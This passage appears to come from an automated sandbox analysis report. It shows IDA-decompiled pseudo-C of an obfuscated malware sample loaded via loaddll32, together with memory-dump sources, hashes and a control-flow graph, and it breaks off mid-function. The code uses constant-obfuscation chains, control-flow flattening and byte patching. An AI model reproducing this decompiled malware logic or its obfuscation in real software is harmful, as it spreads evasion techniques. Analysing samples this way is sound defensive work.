                          				_v268 = _v268 ^ 0xa67107cf;
                          				_v268 = _v268 ^ 0xa67107cf;
                          				_v180 = 0x822106;
                          				_v180 = _v180 ^ 0x7b43f696;
                          				_v180 = _v180 ^ 0xd3ff461a;
                          				_v180 = _v180 ^ 0xa83e91ca;
                          				_v260 = 0xfc96b3;
                          				_v260 = _v260 ^ 0x88d779ee;
                          				_v260 = _v260 | 0x0ca97313;
                          				_v260 = _v260 ^ 0xca187f30;
                          				_v260 = _v260 ^ 0x46b3802f;
                          				_v288 = 0x4333cc;
                          				_v288 = _v288 << 0xf;
                          				_t523 = 0x34;
                          				_v288 = _v288 / _t523;
                          				_v288 = _v288 >> 3;
                          				_v288 = _v288 ^ 0x005b8977;
                          				_v136 = 0xc5dc93;
                          				_v136 = _v136 * 0xc;
                          				_v136 = _v136 ^ 0x0945f62e;
                          				_v128 = 0x6b700a;
                          				_t57 =  &_v128; // 0x6b700a
                          				_v128 =  *_t57 * 0x15;
                          				_v128 = _v128 ^ 0x08d49145;
                          				_v232 = 0xf79846;
                          				_v232 = _v232 ^ 0xca57ef9e;
                          				_v232 = _v232 ^ 0x925d174a;
                          				_v232 = _v232 ^ 0x58faffd4;
                          				_v280 = 0xd1aac6;
                          				_v280 = _v280 >> 0xc;
                          				_v280 = _v280 >> 3;
                          				_v280 = _v280 | 0xe15f3d77;
                          				_v280 = _v280 ^ 0xe1581caf;
                          				_v204 = 0x586478;
                          				_v204 = _v204 << 6;
                          				_v204 = _v204 * 0x45;
                          				_v204 = _v204 ^ 0xf4c06de0;
                          				_v236 = 0x7a6b49;
                          				_v236 = _v236 + 0xfffff53d;
                          				_v236 = _v236 + 0xffff6bfb;
                          				_v236 = _v236 ^ 0x00796dc4;
                          				_v164 = 0x73b924;
                          				_v164 = _v164 * 0x37;
                          				_v164 = _v164 ^ 0x18d89939;
                          				_v140 = 0xd61f2b;
                          				_v140 = _v140 | 0xe12df20d;
                          				_v140 = _v140 ^ 0xe1fed234;
                          				_v264 = 0xb74ee;
                          				_v264 = _v264 | 0x369c0611;
                          				_v264 = _v264 + 0xffffce97;
                          				_v264 = _v264 | 0x56131c90;
                          				_v264 = _v264 ^ 0x76993c7a;
                          				_v188 = 0x86359d;
                          				_v188 = _v188 | 0xee9d04be;
                          				_v188 = _v188 >> 7;
                          				_v188 = _v188 ^ 0x01d63d7e;
                          				_v196 = 0x62a6bf;
                          				_v196 = _v196 ^ 0x13f7b83b;
                          				_v196 = _v196 | 0xfa5dbf29;
                          				_v196 = _v196 ^ 0xfbd613bb;
                          				_v272 = 0x497fb9;
                          				_v272 = _v272 >> 8;
                          				_v272 = _v272 + 0x46f;
                          				_t524 = 0x15;
                          				_v272 = _v272 / _t524;
                          				_v272 = _v272 ^ 0x0006a64c;
                          				_v284 = 0x22ff47;
                          				_v284 = _v284 << 9;
                          				_v284 = _v284 + 0x2a7e;
                          				_v284 = _v284 | 0xa3b8d71b;
                          				_v284 = _v284 ^ 0xe7f75fc1;
                          				_v168 = 0x5effde;
                          				_v168 = _v168 << 0xd;
                          				_v168 = _v168 ^ 0xdff336ff;
                          				_v160 = 0x143f18;
                          				_v160 = _v160 >> 8;
                          				_v160 = _v160 ^ 0x00026d5e;
                          				_v212 = 0x56f8ef;
                          				_t525 = 0x74;
                          				_v212 = _v212 / _t525;
                          				_v212 = _v212 >> 1;
                          				_v212 = _v212 ^ 0x00041781;
                          				_v184 = 0x78f661;
                          				_t526 = 0x24;
                          				_v184 = _v184 / _t526;
                          				_v184 = _v184 << 6;
                          				_v184 = _v184 ^ 0x00d4b0ae;
                          				_v132 = 0xfc57e1;
                          				_v132 = _v132 + 0x95ac;
                          				_v132 = _v132 ^ 0x00fd4e4f;
                          				_v224 = 0x75249d;
                          				_v224 = _v224 >> 2;
                          				_v224 = _v224 << 5;
                          				_v224 = _v224 ^ 0x03a0d1e2;
                          				_v200 = 0x1dd68f;
                          				_t527 = 0x1e;
                          				_v200 = _v200 / _t527;
                          				_v200 = _v200 << 5;
                          				_v200 = _v200 ^ 0x001cc6a7;
                          				_v192 = 0xfcdaf1;
                          				_v192 = _v192 + 0xd795;
                          				_v192 = _v192 >> 9;
                          				_v192 = _v192 ^ 0x00058c90;
                          				_v216 = 0xbb9259;
                          				_t528 = 0x34;
                          				_v216 = _v216 / _t528;
                          				_t529 = 0x52;
                          				_v216 = _v216 * 0x13;
                          				_v216 = _v216 ^ 0x004a95ed;
                          				_v276 = 0x57a41b;
                          				_v276 = _v276 ^ 0xd020dbe5;
                          				_v276 = _v276 | 0x8ab5e016;
                          				_v276 = _v276 + 0xffff22d9;
                          				_v276 = _v276 ^ 0xdaf55aee;
                          				_v244 = 0x1f39e;
                          				_v244 = _v244 >> 7;
                          				_v244 = _v244 | 0x3f4cee99;
                          				_v244 = _v244 / _t529;
                          				_v244 = _v244 ^ 0x00c55e53;
                          				_v208 = 0x8cb9ec;
                          				_v208 = _v208 ^ 0x591dda69;
                          				_v208 = _v208 + 0xffff44b3;
                          				_v208 = _v208 ^ 0x5993fa0d;
                          				_v152 = 0xb0343f;
                          				_v152 = _v152 << 0xf;
                          				_v152 = _v152 ^ 0x1a1cc008;
                          				_v252 = 0xe1a21c;
                          				_v252 = _v252 | 0x952b17c7;
                          				_v252 = _v252 >> 0xb;
                          				_v252 = _v252 + 0x3107;
                          				_v252 = _v252 ^ 0x00168178;
                          				_v176 = 0x1f45f4;
                          				_v176 = _v176 + 0xffffb6c3;
                          				_v176 = _v176 >> 3;
                          				_v176 = _v176 ^ 0x000294fa;
                          				_v144 = 0xd98b7;
                          				_v144 = _v144 + 0xdfca;
                          				_v144 = _v144 ^ 0x00064cf8;
                          				_v124 = 0xf97c3c;
                          				_v124 = _v124 << 0xe;
                          				_v124 = _v124 ^ 0x5f01afd1;
                          				_v220 = 0xbf67e3;
                          				_v220 = _v220 >> 0xf;
                          				_v220 = _v220 >> 8;
                          				_v220 = _v220 ^ 0x0002d002;
                          				_v148 = 0xfa1be7;
                          				_v148 = _v148 * 0x4c;
                          				_v148 = _v148 ^ 0x4a419838;
                          				_v228 = 0xe7473d;
                          				_v228 = _v228 + 0x3507;
                          				_v228 = _v228 ^ 0x00ead38c;
                          				_v156 = 0x66a8ab;
                          				_v156 = _v156 | 0x79d54c9c;
                          				_v156 = _v156 ^ 0x79fe3884;
                          				_v240 = 0x18be1a;
                          				_v240 = _v240 ^ 0x7e543587;
                          				_v240 = _v240 * 0x68;
                          				_v240 = _v240 | 0xe3fcfdd3;
                          				_v240 = _v240 ^ 0xeff94d70;
                          				_v172 = 0x9913c4;
                          				_v172 = _v172 * 0x77;
                          				_v172 = _v172 + 0xffffc63d;
                          				_v172 = _v172 ^ 0x47206855;
                          				_v248 = 0xd44183;
                          				_v248 = _v248 + 0xd298;
                          				_v248 = _v248 << 4;
                          				_v248 = _v248 ^ 0x50766a5f;
                          				_v248 = _v248 ^ 0x5d272bff;
                          				_v256 = 0x31eb30;
                          				_v256 = _v256 ^ 0xb25f58d4;
                          				_v256 = _v256 ^ 0x46bb6998;
                          				_t530 = 0x74;
                          				_v256 = _v256 / _t530;
                          				_v256 = _v256 ^ 0x021c5309;
                          				while(1) {
                          					L1:
                          					_t531 = _v120;
                          					goto L2;
                          					do {
                          						while(1) {
                          							L2:
                          							_t543 = _t479 - 0x3286a26;
                          							if(_t543 > 0) {
                          								break;
                          							}
                          							if(_t543 == 0) {
                          								E00D52B09(_v220, _v116, _v148, _v228);
                          								_t479 = 0x483cb7c;
                          								continue;
                          							}
                          							if(_t479 == 0xd18f0a) {
                          								_t455 = E00D357B8( *_t477, _v288, _v136,  *((intOrPtr*)(_t477 + 4)), _v128,  &_v32, _v232);
                          								_t539 =  &(_t539[6]);
                          								if(_t455 == 0) {
                          									L33:
                          									return _v108;
                          								}
                          								_t479 = 0x98446cf;
                          								continue;
                          							}
                          							if(_t479 == 0x2686f46) {
                          								_t534 =  *_t537;
                          								E00D35026(_v184, _v132, _v224, _t534, _v200);
                          								_t535 = _t534 + _v260;
                          								E00D4C9B0(_v192, _t535, _v216, _v112, _v116, _v276);
                          								_push(_v152);
                          								_t536 = _t535 + _v112;
                          								_t492 = _t531;
                          								_push(_v208);
                          								_push(_t536);
                          								E00D371B3(_t492, _v244);
                          								_t532 =  &(_t536[_t531]);
                          								_t541 =  &(_t539[0xa]);
                          								_t519 = _t536;
                          								if(_t536 >= _t532) {
                          									L16:
                          									_push(_t492);
                          									_push(_t492);
                          									_t464 = E00D4CCA0(0, 0xe);
                          									_t539 =  &(_t541[4]);
                          									_t479 = 0x3286a26;
                          									 *((char*)(_t464 + _t536)) = 0;
                          									_t533 = _v104;
                          									goto L1;
                          								} else {
                          									goto L13;
                          								}
                          								do {
                          									L13:
                          									_t492 = _v268;
                          									if(( *_t519 & 0x000000ff) == _t492) {
                          										 *_t519 = 0xc3;
                          									}
                          									_t519 =  &(_t519[1]);
                          								} while (_t519 < _t532);
                          								goto L16;
                          							}
                          							if(_t479 == 0x2d8a01e) {
                          								_t479 = 0xd18f0a;
                          								continue;
                          							}
                          							if(_t479 != 0x3056d50) {
                          								goto L30;
                          							}
                          							_push(_t479);
                          							_push(_t479);
                          							_t469 = E00D3C5D8(_a4);
                          							_t539 =  &(_t539[3]);
                          							 *_t537 = _t469;
                          							if(_t469 == 0) {
                          								_t479 = 0x3286a26;
                          							} else {
                          								_v108 = 1;
                          								_t479 = 0x2686f46;
                          							}
                          						}
                          						if(_t479 == 0x34d1508) {
                          							if(E00D3FB8E(_v164,  &_v100,  &_v116, _v140) == 0) {
                          								_t479 = 0x483cb7c;
                          								goto L30;
                          							}
                          							_t479 = 0x5c08967;
                          							goto L2;
                          						}
                          						if(_t479 == 0x483cb7c) {
                          							E00D52B09(_v156, _v100, _v240, _v172);
                          							goto L33;
                          						}
                          						if(_t479 == 0x5c08967) {
                          							_push(_t479);
                          							_push(_t479);
                          							_t531 = E00D4CCA0(_v248, _v256);
                          							_t539 =  &(_t539[4]);
                          							_t479 = 0x3056d50;
                          							_v120 = _t531;
                          							_a4 = _v180 + _t531 + _v112;
                          							goto L2;
                          						}
                          						if(_t479 != 0x98446cf) {
                          							goto L30;
                          						}
                          						_v92 =  &_v32;
                          						_v68 =  *_t477;
                          						_v64 =  *((intOrPtr*)(_t477 + 4));
                          						_v60 = _t533;
                          						_v88 = 0x20;
                          						_t475 = E00D3E7DE(_v280, _v204,  &_v92,  &_v100, _v236);
                          						_t539 =  &(_t539[3]);
                          						if(_t475 == 0) {
                          							goto L33;
                          						}
                          						_t479 = 0x34d1508;
                          						goto L2;
                          						L30:
                          					} while (_t479 != 0x5241bf8);
                          					goto L33;
                          				}
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: pk$ $01$=G$Ikz$Uh G$_jvP$w=_$xdX$~*
                          • API String ID: 0-1860247402
                          • Opcode ID: fa76ad5acae243c1c6f25466b63a0bb5d20f34d56f5c0675485de595a933ec53
                          • Instruction ID: 25a24c48b1e5b86bd666d596e7ebf2e1724ba9047728e4b91143596d468eca5e
                          • Opcode Fuzzy Hash: fa76ad5acae243c1c6f25466b63a0bb5d20f34d56f5c0675485de595a933ec53
                          • Instruction Fuzzy Hash: 6D2232715093809FC768CF25C58AA9BBBE2FFC5704F108A1DE6DA96260D7B18948CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph (function at d47d5b-d483ce)
                          C-Code - Quality: 96%
                          			E00D47D5B(void* __ecx) {
                          				char _v520;
                          				char _v1040;
                          				char _v1560;
                          				char _v2080;
                          				char _v2600;
                          				signed int _v2604;
                          				signed int _v2608;
                          				signed int _v2612;
                          				signed int _v2616;
                          				signed int _v2620;
                          				signed int _v2624;
                          				signed int _v2628;
                          				signed int _v2632;
                          				signed int _v2636;
                          				signed int _v2640;
                          				signed int _v2644;
                          				signed int _v2648;
                          				signed int _v2652;
                          				signed int _v2656;
                          				signed int _v2660;
                          				signed int _v2664;
                          				signed int _v2668;
                          				signed int _v2672;
                          				signed int _v2676;
                          				signed int _v2680;
                          				signed int _v2684;
                          				signed int _v2688;
                          				signed int _v2692;
                          				signed int _v2696;
                          				signed int _v2700;
                          				signed int _v2704;
                          				signed int _v2708;
                          				signed int _v2712;
                          				signed int _v2716;
                          				signed int _v2720;
                          				signed int _v2724;
                          				signed int _v2728;
                          				signed int _v2732;
                          				signed int _v2736;
                          				signed int _v2740;
                          				signed int _v2744;
                          				signed int _v2748;
                          				signed int _v2752;
                          				signed int _v2756;
                          				signed int _v2760;
                          				signed int _v2764;
                          				signed int _v2768;
                          				signed int _v2772;
                          				signed int _v2776;
                          				signed int _v2780;
                          				signed int _v2784;
                          				signed int _v2788;
                          				signed int _v2792;
                          				signed int _t420;
                          				signed int _t442;
                          				signed int _t443;
                          				signed int _t444;
                          				signed int _t445;
                          				signed int _t446;
                          				signed int _t447;
                          				signed int _t448;
                          				void* _t488;
                          				void* _t489;
                          				signed int* _t493;
                          
                          				_t493 =  &_v2792;
                          				_v2792 = 0x289571;
                          				_v2792 = _v2792 | 0xf6df9bca;
                          				_v2792 = _v2792 + 0xea43;
                          				_v2792 = _v2792 ^ 0xf7008a17;
                          				_v2788 = 0xdb8a78;
                          				_v2788 = _v2788 * 6;
                          				_t488 = __ecx;
                          				_t489 = 0x219adc7;
                          				_t442 = 0x7a;
                          				_v2788 = _v2788 / _t442;
                          				_t443 = 0x42;
                          				_v2788 = _v2788 * 0x3d;
                          				_v2788 = _v2788 ^ 0x0296dfb6;
                          				_v2660 = 0xc0a6c5;
                          				_v2660 = _v2660 << 6;
                          				_v2660 = _v2660 ^ 0x3025665c;
                          				_v2692 = 0x3a8fa3;
                          				_v2692 = _v2692 ^ 0xa120b079;
                          				_v2692 = _v2692 | 0x9ac88514;
                          				_v2692 = _v2692 ^ 0xbbd9167d;
                          				_v2668 = 0xec1a87;
                          				_v2668 = _v2668 + 0x8cab;
                          				_v2668 = _v2668 ^ 0x00e348c2;
                          				_v2628 = 0xecd9a9;
                          				_v2628 = _v2628 << 9;
                          				_v2628 = _v2628 ^ 0xd9bcc0eb;
                          				_v2756 = 0xbae8da;
                          				_v2756 = _v2756 + 0xefc;
                          				_v2756 = _v2756 * 0x2c;
                          				_v2756 = _v2756 ^ 0x76eb1803;
                          				_v2756 = _v2756 ^ 0x56c3d905;
                          				_v2780 = 0x787147;
                          				_v2780 = _v2780 + 0xffff6597;
                          				_v2780 = _v2780 + 0xffffc18b;
                          				_v2780 = _v2780 | 0x826dfd4e;
                          				_v2780 = _v2780 ^ 0x827371e5;
                          				_v2712 = 0x74bd84;
                          				_v2712 = _v2712 >> 9;
                          				_v2712 = _v2712 + 0xbcb6;
                          				_v2712 = _v2712 ^ 0x0001f6d9;
                          				_v2680 = 0x714a85;
                          				_v2680 = _v2680 | 0x3dc400c8;
                          				_v2680 = _v2680 ^ 0x3df5425d;
                          				_v2612 = 0xace488;
                          				_v2612 = _v2612 | 0xd2617c07;
                          				_v2612 = _v2612 ^ 0xd2e83d7d;
                          				_v2736 = 0x9a08fa;
                          				_v2736 = _v2736 + 0x9c03;
                          				_v2736 = _v2736 << 5;
                          				_v2736 = _v2736 ^ 0x135d006f;
                          				_v2652 = 0x41ccd2;
                          				_v2652 = _v2652 ^ 0x97b2ef27;
                          				_v2652 = _v2652 ^ 0x97fb61bc;
                          				_v2764 = 0x9e119e;
                          				_v2764 = _v2764 << 2;
                          				_v2764 = _v2764 | 0x268f2d0f;
                          				_v2764 = _v2764 / _t443;
                          				_v2764 = _v2764 ^ 0x009ccc86;
                          				_v2620 = 0x8f6e28;
                          				_v2620 = _v2620 >> 3;
                          				_v2620 = _v2620 ^ 0x00104951;
                          				_v2772 = 0xe21e14;
                          				_v2772 = _v2772 + 0xffff5b09;
                          				_v2772 = _v2772 * 0x18;
                          				_v2772 = _v2772 + 0xc00a;
                          				_v2772 = _v2772 ^ 0x152b5515;
                          				_v2608 = 0x3d3ea7;
                          				_v2608 = _v2608 + 0x63eb;
                          				_v2608 = _v2608 ^ 0x0030ec7d;
                          				_v2644 = 0x866304;
                          				_v2644 = _v2644 + 0x379c;
                          				_v2644 = _v2644 ^ 0x008e4788;
                          				_v2604 = 0xe77a6a;
                          				_t121 =  &_v2604; // 0xe77a6a
                          				_t444 = 0x63;
                          				_v2604 =  *_t121 / _t444;
                          				_v2604 = _v2604 ^ 0x000e0408;
                          				_v2696 = 0xf5199c;
                          				_v2696 = _v2696 << 8;
                          				_v2696 = _v2696 << 3;
                          				_v2696 = _v2696 ^ 0xa8c2da1f;
                          				_v2636 = 0xbfea70;
                          				_v2636 = _v2636 | 0x60f37e4e;
                          				_v2636 = _v2636 ^ 0x60f450e6;
                          				_v2720 = 0x6acbb3;
                          				_t445 = 0x6c;
                          				_v2720 = _v2720 / _t445;
                          				_v2720 = _v2720 >> 9;
                          				_v2720 = _v2720 ^ 0x00013488;
                          				_v2704 = 0x72224f;
                          				_v2704 = _v2704 << 9;
                          				_v2704 = _v2704 + 0xffff0fb2;
                          				_v2704 = _v2704 ^ 0xe44ad0e5;
                          				_v2728 = 0xe68b79;
                          				_v2728 = _v2728 | 0x8e61462a;
                          				_v2728 = _v2728 >> 1;
                          				_v2728 = _v2728 ^ 0x477bf727;
                          				_v2616 = 0x4099b0;
                          				_v2616 = _v2616 + 0xfa8f;
                          				_v2616 = _v2616 ^ 0x0048c0a5;
                          				_v2688 = 0xff8ffd;
                          				_v2688 = _v2688 ^ 0x53972d47;
                          				_t446 = 0x60;
                          				_v2688 = _v2688 / _t446;
                          				_v2688 = _v2688 ^ 0x00dac0dc;
                          				_v2744 = 0xc2c855;
                          				_v2744 = _v2744 | 0x821d7436;
                          				_t447 = 0x65;
                          				_v2744 = _v2744 * 0x46;
                          				_v2744 = _v2744 ^ 0xc93dde39;
                          				_v2664 = 0x8fcf69;
                          				_v2664 = _v2664 ^ 0x92a1f028;
                          				_v2664 = _v2664 ^ 0x922e5d56;
                          				_v2672 = 0x138bb7;
                          				_v2672 = _v2672 + 0xffff6c98;
                          				_v2672 = _v2672 ^ 0x001bead2;
                          				_v2784 = 0x1d404b;
                          				_v2784 = _v2784 ^ 0xbb38c348;
                          				_v2784 = _v2784 >> 0xb;
                          				_v2784 = _v2784 | 0xeccea58e;
                          				_v2784 = _v2784 ^ 0xecdc694e;
                          				_v2676 = 0xbdcffc;
                          				_v2676 = _v2676 ^ 0x5aef785e;
                          				_v2676 = _v2676 ^ 0x5a57f2e1;
                          				_v2768 = 0xceb2dd;
                          				_v2768 = _v2768 | 0xafbcd5ba;
                          				_v2768 = _v2768 * 0xf;
                          				_v2768 = _v2768 / _t447;
                          				_v2768 = _v2768 ^ 0x00c1507c;
                          				_v2732 = 0xba5c67;
                          				_v2732 = _v2732 + 0xffff3085;
                          				_v2732 = _v2732 ^ 0x29fec498;
                          				_v2732 = _v2732 ^ 0x29414316;
                          				_v2740 = 0xfebc70;
                          				_v2740 = _v2740 >> 6;
                          				_t448 = 0x4c;
                          				_v2740 = _v2740 * 0x46;
                          				_v2740 = _v2740 ^ 0x01107382;
                          				_v2776 = 0x1fdbbd;
                          				_v2776 = _v2776 + 0xffff7a05;
                          				_v2776 = _v2776 << 5;
                          				_v2776 = _v2776 + 0xffff7a3d;
                          				_v2776 = _v2776 ^ 0x03eed3d9;
                          				_v2708 = 0xe5e896;
                          				_v2708 = _v2708 << 6;
                          				_v2708 = _v2708 + 0x807d;
                          				_v2708 = _v2708 ^ 0x3973facc;
                          				_v2716 = 0xdc1d9;
                          				_v2716 = _v2716 | 0xfc1937aa;
                          				_v2716 = _v2716 + 0xffffd03c;
                          				_v2716 = _v2716 ^ 0xfc1f97ce;
                          				_v2648 = 0xeb72b6;
                          				_v2648 = _v2648 >> 8;
                          				_v2648 = _v2648 ^ 0x0003133b;
                          				_v2724 = 0x35c70c;
                          				_v2724 = _v2724 + 0xffff3120;
                          				_v2724 = _v2724 + 0xda65;
                          				_v2724 = _v2724 ^ 0x003bd395;
                          				_v2656 = 0x588c44;
                          				_v2656 = _v2656 ^ 0x3c8fee8a;
                          				_v2656 = _v2656 ^ 0x3cdfb996;
                          				_v2632 = 0xa98095;
                          				_v2632 = _v2632 + 0xf08e;
                          				_v2632 = _v2632 ^ 0x00ab49e1;
                          				_v2640 = 0x908171;
                          				_v2640 = _v2640 << 0xa;
                          				_v2640 = _v2640 ^ 0x42069508;
                          				_v2748 = 0xf99537;
                          				_v2748 = _v2748 >> 9;
                          				_v2748 = _v2748 | 0x4d3f7029;
                          				_v2748 = _v2748 ^ 0x4d356fb4;
                          				_v2700 = 0xf7c115;
                          				_v2700 = _v2700 + 0xffffc630;
                          				_v2700 = _v2700 >> 5;
                          				_v2700 = _v2700 ^ 0x0003a618;
                          				_v2624 = 0xf73d89;
                          				_v2624 = _v2624 * 0x3f;
                          				_v2624 = _v2624 ^ 0x3cd41ae8;
                          				_v2684 = 0x237d3e;
                          				_v2684 = _v2684 + 0xffff7bf2;
                          				_v2684 = _v2684 << 0xb;
                          				_v2684 = _v2684 ^ 0x17c7121d;
                          				_v2752 = 0x3823b3;
                          				_v2752 = _v2752 * 0x2a;
                          				_v2752 = _v2752 + 0xffff9ab5;
                          				_v2752 = _v2752 >> 9;
                          				_v2752 = _v2752 ^ 0x0000d6a9;
                          				_v2760 = 0x9d905;
                          				_t420 = _v2760 / _t448;
                          				_v2760 = _t420;
                          				_v2760 = _v2760 + 0xffff5226;
                          				_v2760 = _v2760 ^ 0x58f88d53;
                          				_v2760 = _v2760 ^ 0xa70b0c4e;
                          				while(_t489 != 0x219adc7) {
                          					if(_t489 == 0x472b880) {
                          						E00D31A34(_v2744,  &_v1040, _t448, _t448, _v2664, _v2672, _v2784, _t448, _v2792, _v2676);
                          						_push(_v2776);
                          						_push(_v2740);
                          						_push(_v2732);
                          						E00D52D0A(_v2716, __eflags,  &_v2080, _v2648, _v2724, _v2656, 0xd3196c,  &_v520,  &_v1040, E00D4E1F8(0xd3196c, _v2768, __eflags));
                          						E00D4FECB(_t422, _v2632, _v2640, _v2748, _v2700);
                          						__eflags = 0;
                          						return E00D485FF(_v2624, _v2684, 0, 0,  &_v520, 0, _v2752, 0, _v2760);
                          					}
                          					_t501 = _t489 - 0x6430241;
                          					if(_t489 != 0x6430241) {
                          						L7:
                          						__eflags = _t489 - 0xc99ad3;
                          						if(__eflags != 0) {
                          							continue;
                          						} else {
                          							return _t420;
                          						}
                          						L10:
                          						return _t420;
                          					}
                          					E00D50DB1(_v2788,  &_v2600, _t501, _v2660, _t448, _v2692);
                          					 *((short*)(E00D409DD(_v2668,  &_v2600, _v2628, _v2756))) = 0;
                          					E00D3BAA9(_v2780, _v2712, _t501, _v2680, _v2612,  &_v1560);
                          					_push(_v2620);
                          					_push(_v2764);
                          					_push(_v2652);
                          					E00D52D0A(_v2608, _t501,  &_v1560, _v2644, _v2604, _v2696, 0xd3188c,  &_v2080,  &_v2600, E00D4E1F8(0xd3188c, _v2736, _t501));
                          					E00D4FECB(_t434, _v2636, _v2720, _v2704, _v2728);
                          					_t448 = _v2616;
                          					_t420 = E00D3BFBE( &_v2080, _t488, _v2688);
                          					_t493 =  &(_t493[0x18]);
                          					if(_t420 != 0) {
                          						_t489 = 0x472b880;
                          						continue;
                          					}
                          					goto L10;
                          				}
                          				_t489 = 0x6430241;
                          				goto L7;
                          			}


                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $P$)p?M$>}#$Gqx$O"r$\f%0$^xZ$jz$o$}0
                          • API String ID: 0-1313373530
                          • Opcode ID: aee28f8d61efb1c96371f7aefb6614ae8ee1044a1ce739bba61eb0a657ee4a71
                          • Instruction ID: 435a2ab9befcab395cb41bfc5e777dd64c7badd1821d174fc5bae0092cd059d4
                          • Opcode Fuzzy Hash: aee28f8d61efb1c96371f7aefb6614ae8ee1044a1ce739bba61eb0a657ee4a71
                          • Instruction Fuzzy Hash: 0412F2715093819FD3A8CF21C94AA9BFBE2FBC5708F10891DE1D996260D7B58909CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 928 d3238c-d32ad1 929 d32ad8-d32add 928->929 930 d32ae2-d32ae8 929->930 931 d32d22-d32d51 call d4c387 call d4bc6b 930->931 932 d32aee-d32af4 930->932 952 d32d56-d32d5c 931->952 933 d32afa-d32afc 932->933 934 d32d78-d32dad call d485ff 932->934 937 d32b02-d32b04 933->937 938 d32d64-d32d76 933->938 947 d32ddf-d32de9 934->947 948 d32daf-d32dd2 call d51538 934->948 942 d32cb3-d32cee call d4017b 937->942 943 d32b0a-d32b10 937->943 940 d32dd9-d32dde call d51538 938->940 940->947 960 d32cf0-d32d1d call d51538 * 2 942->960 961 d32c89-d32c8b 942->961 949 d32b16-d32b1c 943->949 950 d32ca9-d32cae 943->950 948->940 955 d32b1e-d32b24 949->955 956 d32b7c-d32c87 call d50db1 call d409dd call d3baa9 call d4e1f8 call d52d0a call d4fecb call d3bfbe 949->956 950->930 952->930 958 d32d62 952->958 955->952 963 d32b2a-d32b2c 955->963 956->961 986 d32c90-d32ca4 956->986 958->947 960->961 961->929 966 d32b72-d32b77 963->966 967 d32b2e-d32b62 call d49774 963->967 966->930 967->947 974 d32b68-d32b6d 967->974 974->929 986->930
                          C-Code - Quality: 94%
                          			E00D3238C(void* __ecx) {
                          				char _v524;
                          				char _v1044;
                          				char _v1564;
                          				intOrPtr _v1576;
                          				char _v1580;
                          				signed int _v1584;
                          				signed int _v1588;
                          				signed int _v1592;
                          				signed int _v1596;
                          				signed int _v1600;
                          				signed int _v1604;
                          				signed int _v1608;
                          				signed int _v1612;
                          				signed int _v1616;
                          				signed int _v1620;
                          				signed int _v1624;
                          				signed int _v1628;
                          				signed int _v1632;
                          				signed int _v1636;
                          				signed int _v1640;
                          				signed int _v1644;
                          				signed int _v1648;
                          				signed int _v1652;
                          				signed int _v1656;
                          				signed int _v1660;
                          				signed int _v1664;
                          				signed int _v1668;
                          				signed int _v1672;
                          				signed int _v1676;
                          				signed int _v1680;
                          				signed int _v1684;
                          				signed int _v1688;
                          				signed int _v1692;
                          				signed int _v1696;
                          				signed int _v1700;
                          				signed int _v1704;
                          				signed int _v1708;
                          				signed int _v1712;
                          				unsigned int _v1716;
                          				signed int _v1720;
                          				signed int _v1724;
                          				signed int _v1728;
                          				signed int _v1732;
                          				signed int _v1736;
                          				signed int _v1740;
                          				signed int _v1744;
                          				signed int _v1748;
                          				signed int _v1752;
                          				signed int _v1756;
                          				signed int _v1760;
                          				signed int _v1764;
                          				signed int _v1768;
                          				signed int _v1772;
                          				signed int _v1776;
                          				signed int _v1780;
                          				signed int _v1784;
                          				signed int _v1788;
                          				signed int _v1792;
                          				void* _t472;
                          				void* _t474;
                          				void* _t477;
                          				void* _t481;
                          				void* _t496;
                          				signed int _t498;
                          				signed int _t499;
                          				signed int _t500;
                          				signed int _t501;
                          				signed int _t502;
                          				void* _t503;
                          				signed int _t507;
                          				signed int _t537;
                          				signed int _t548;
                          				void* _t550;
                          				void* _t555;
                          
                          				_v1584 = _v1584 & 0x00000000;
                          				_v1788 = 0x33fdc0;
                          				_v1788 = _v1788 >> 6;
                          				_v1788 = _v1788 + 0xffff8381;
                          				_v1788 = _v1788 | 0x21bcf8d5;
                          				_v1788 = _v1788 ^ 0x23bcfbfd;
                          				_v1744 = 0xdaa9b2;
                          				_v1744 = _v1744 >> 0xa;
                          				_v1744 = _v1744 >> 0xd;
                          				_v1744 = _v1744 * 0xc;
                          				_t496 = __ecx;
                          				_v1744 = _v1744 ^ 0x00028d02;
                          				_t550 = 0x854d193;
                          				_v1632 = 0x7e6112;
                          				_v1632 = _v1632 << 4;
                          				_v1632 = _v1632 ^ 0x07e103ba;
                          				_v1716 = 0xd48fca;
                          				_v1716 = _v1716 + 0x54b9;
                          				_v1716 = _v1716 >> 3;
                          				_v1716 = _v1716 ^ 0x00172ea2;
                          				_v1612 = 0xc953de;
                          				_v1612 = _v1612 + 0xffff7488;
                          				_v1612 = _v1612 ^ 0x00c8e870;
                          				_v1660 = 0xfcf42a;
                          				_v1660 = _v1660 ^ 0x4c4ed76c;
                          				_v1660 = _v1660 ^ 0x4cb955ce;
                          				_v1600 = 0xa6934b;
                          				_v1600 = _v1600 >> 7;
                          				_v1600 = _v1600 ^ 0x00032972;
                          				_v1604 = 0xac816b;
                          				_t498 = 0x70;
                          				_v1604 = _v1604 * 0x21;
                          				_v1604 = _v1604 ^ 0x16380272;
                          				_v1696 = 0x6f97e6;
                          				_v1696 = _v1696 | 0xa083c342;
                          				_v1696 = _v1696 ^ 0x07d73a4d;
                          				_v1696 = _v1696 ^ 0xa73f6dc5;
                          				_v1684 = 0xc2049d;
                          				_v1684 = _v1684 << 5;
                          				_v1684 = _v1684 ^ 0x7749f8a8;
                          				_v1684 = _v1684 ^ 0x6f051565;
                          				_v1652 = 0xcc0992;
